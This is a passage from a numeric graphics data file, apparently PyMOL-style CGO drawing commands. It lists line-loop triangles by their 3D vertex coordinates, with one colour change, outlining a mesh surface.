VERTEX, 11.618, 35.599, 23.097,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.249, 35.318, 23.284,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.387, 35.263, 23.459,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.751, 35.528, 23.271,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.387, 35.263, 23.459,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 11.529, 35.089, 23.505,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.892, 35.351, 23.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.529, 35.089, 23.505,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 11.592, 34.897, 23.396,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.960, 35.170, 23.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.592, 34.897, 23.396,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 11.539, 34.800, 23.194,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 11.539, 34.800, 23.194,
VERTEX, 11.914, 35.093, 22.971,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 11.782, 35.163, 22.797,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 12.115, 35.458, 22.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.782, 35.163, 22.797,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 11.640, 35.340, 22.762,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.974, 35.637, 22.602,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.640, 35.340, 22.762,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 11.573, 35.521, 22.886,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.901, 35.808, 22.738,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.573, 35.521, 22.886,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 11.618, 35.599, 23.097,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.940, 35.869, 22.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.618, 35.599, 23.097,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 11.751, 35.528, 23.271,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 12.067, 35.785, 23.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.751, 35.528, 23.271,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 11.892, 35.351, 23.306,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 12.208, 35.606, 23.154,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.892, 35.351, 23.306,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 11.960, 35.170, 23.182,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 12.281, 35.436, 23.017,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.960, 35.170, 23.182,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 11.914, 35.093, 22.971,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 11.914, 35.093, 22.971,
VERTEX, 12.242, 35.375, 22.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.115, 35.458, 22.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 12.420, 35.746, 22.509,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.115, 35.458, 22.628,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 11.974, 35.637, 22.602,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 12.278, 35.926, 22.492,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.974, 35.637, 22.602,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 11.901, 35.808, 22.738,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 12.197, 36.083, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.901, 35.808, 22.738,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 11.940, 35.869, 22.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 12.223, 36.126, 22.862,
END,
BEGIN, LINE_LOOP,
VERTEX, 11.940, 35.869, 22.956,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.067, 35.785, 23.128,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 12.341, 36.028, 23.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.067, 35.785, 23.128,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.208, 35.606, 23.154,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 12.483, 35.848, 23.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.208, 35.606, 23.154,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.281, 35.436, 23.017,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 12.564, 35.691, 22.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.281, 35.436, 23.017,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.242, 35.375, 22.800,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.242, 35.375, 22.800,
VERTEX, 12.538, 35.649, 22.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 12.420, 35.746, 22.509,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 12.707, 36.028, 22.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.420, 35.746, 22.509,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.278, 35.926, 22.492,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 12.564, 36.208, 22.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.278, 35.926, 22.492,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.197, 36.083, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 12.470, 36.349, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.197, 36.083, 22.638,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.223, 36.126, 22.862,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.478, 36.369, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.223, 36.126, 22.862,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.341, 36.028, 23.033,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.585, 36.257, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.341, 36.028, 23.033,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.483, 35.848, 23.050,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.728, 36.077, 22.994,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.483, 35.848, 23.050,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.564, 35.691, 22.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.823, 35.936, 22.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 35.691, 22.904,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 12.538, 35.649, 22.680,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 12.538, 35.649, 22.680,
VERTEX, 12.814, 35.916, 22.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 12.707, 36.028, 22.443,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.987, 36.303, 22.430,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.707, 36.028, 22.443,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 12.564, 36.208, 22.432,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.842, 36.481, 22.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.564, 36.208, 22.432,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 12.470, 36.349, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.731, 36.604, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.470, 36.349, 22.586,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.478, 36.369, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.720, 36.600, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.478, 36.369, 22.815,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.585, 36.257, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.814, 36.472, 22.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.585, 36.257, 22.984,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 12.728, 36.077, 22.994,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.959, 36.293, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.728, 36.077, 22.994,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 12.823, 35.936, 22.840,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 13.070, 36.170, 22.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.823, 35.936, 22.840,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 12.814, 35.916, 22.612,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 12.814, 35.916, 22.612,
VERTEX, 13.081, 36.174, 22.595,
END,
COLOR, 0.000, 0.878, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 12.987, 36.303, 22.430,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 13.266, 36.570, 22.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.987, 36.303, 22.430,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 12.842, 36.481, 22.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 13.119, 36.746, 22.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.842, 36.481, 22.426,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 12.731, 36.604, 22.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.993, 36.849, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.731, 36.604, 22.586,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 12.720, 36.600, 22.815,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.961, 36.819, 22.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.720, 36.600, 22.815,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 12.814, 36.472, 22.980,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 13.044, 36.674, 23.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.814, 36.472, 22.980,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 12.959, 36.293, 22.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 13.191, 36.498, 23.018,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.959, 36.293, 22.984,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.070, 36.170, 22.825,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 13.318, 36.395, 22.856,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.070, 36.170, 22.825,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.081, 36.174, 22.595,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.081, 36.174, 22.595,
VERTEX, 13.349, 36.425, 22.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.266, 36.570, 22.473,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 13.554, 36.827, 22.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.266, 36.570, 22.473,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.119, 36.746, 22.476,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 13.403, 36.999, 22.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.119, 36.746, 22.476,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 12.993, 36.849, 22.638,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 13.263, 37.082, 22.743,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.993, 36.849, 22.638,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 12.961, 36.819, 22.863,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 13.216, 37.027, 22.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 12.961, 36.819, 22.863,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.044, 36.674, 23.020,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 13.290, 36.866, 23.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.044, 36.674, 23.020,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.191, 36.498, 23.018,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.440, 36.694, 23.096,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.191, 36.498, 23.018,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.318, 36.395, 22.856,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.581, 36.611, 22.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.318, 36.395, 22.856,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.349, 36.425, 22.631,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.349, 36.425, 22.631,
VERTEX, 13.628, 36.666, 22.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 13.554, 36.827, 22.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.860, 37.072, 22.719,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.554, 36.827, 22.570,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 13.403, 36.999, 22.581,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 13.705, 37.241, 22.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.403, 36.999, 22.581,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 13.263, 37.082, 22.743,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 13.555, 37.303, 22.902,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.263, 37.082, 22.743,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.216, 37.027, 22.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.497, 37.224, 23.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.216, 37.027, 22.961,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.290, 36.866, 23.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.566, 37.049, 23.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.290, 36.866, 23.107,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.440, 36.694, 23.096,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.721, 36.881, 23.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.440, 36.694, 23.096,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 13.581, 36.611, 22.934,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.871, 36.818, 23.059,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.581, 36.611, 22.934,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 13.628, 36.666, 22.716,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 13.628, 36.666, 22.716,
VERTEX, 13.929, 36.898, 22.851,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 13.860, 37.072, 22.719,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 14.196, 37.308, 22.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.860, 37.072, 22.719,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 13.705, 37.241, 22.740,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 14.036, 37.470, 22.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.705, 37.241, 22.740,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 13.555, 37.303, 22.902,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.879, 37.512, 23.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.555, 37.303, 22.902,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 13.497, 37.224, 23.110,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.817, 37.410, 23.311,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.497, 37.224, 23.110,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 13.566, 37.049, 23.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.885, 37.223, 23.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.566, 37.049, 23.242,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 13.721, 36.881, 23.221,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 14.045, 37.061, 23.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.721, 36.881, 23.221,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 13.871, 36.818, 23.059,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 14.202, 37.019, 23.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.871, 36.818, 23.059,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 13.929, 36.898, 22.851,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 13.929, 36.898, 22.851,
VERTEX, 14.264, 37.121, 23.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 14.196, 37.308, 22.920,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 14.579, 37.540, 23.177,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.196, 37.308, 22.920,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.036, 37.470, 22.953,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 14.415, 37.693, 23.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.036, 37.470, 22.953,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 13.879, 37.512, 23.116,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 14.252, 37.710, 23.388,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.879, 37.512, 23.116,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 13.817, 37.410, 23.311,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 14.185, 37.580, 23.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.817, 37.410, 23.311,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 13.885, 37.223, 23.426,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 14.253, 37.380, 23.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 13.885, 37.223, 23.426,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.045, 37.061, 23.392,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 14.417, 37.227, 23.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.045, 37.061, 23.392,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.202, 37.019, 23.230,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 14.580, 37.210, 23.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.202, 37.019, 23.230,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.264, 37.121, 23.034,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.264, 37.121, 23.034,
VERTEX, 14.647, 37.340, 23.267,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 14.579, 37.540, 23.177,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.967, 37.712, 23.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.579, 37.540, 23.177,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 14.415, 37.693, 23.227,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 14.801, 37.855, 23.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.415, 37.693, 23.227,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 14.252, 37.710, 23.388,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 14.626, 37.841, 23.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.252, 37.710, 23.388,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.185, 37.580, 23.565,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 14.544, 37.679, 23.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.185, 37.580, 23.565,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.253, 37.380, 23.655,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.544, 37.679, 23.842,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.604, 37.463, 23.893,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.253, 37.380, 23.655,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.417, 37.227, 23.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.604, 37.463, 23.893,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.771, 37.320, 23.824,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.417, 37.227, 23.605,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 14.580, 37.210, 23.444,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.771, 37.320, 23.824,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.946, 37.334, 23.676,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.580, 37.210, 23.444,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 14.647, 37.340, 23.267,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.946, 37.334, 23.676,
VERTEX, 14.647, 37.340, 23.267,
VERTEX, 15.027, 37.497, 23.536,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.027, 37.497, 23.536,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 14.967, 37.712, 23.485,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.347, 37.544, 23.823,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 15.300, 37.769, 23.821,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.967, 37.712, 23.485,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 14.801, 37.855, 23.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.300, 37.769, 23.821,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 15.133, 37.901, 23.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.801, 37.855, 23.554,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 14.626, 37.841, 23.701,
END,
BEGIN, LINE_LOOP,
VERTEX, 15.133, 37.901, 23.907,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.943, 37.862, 24.030,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.626, 37.841, 23.701,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 14.544, 37.679, 23.842,
END,
BEGIN, LINE_LOOP,
VERTEX, 14.943, 37.862, 24.030,
VERTEX, 14.544, 37.679, 23.842,
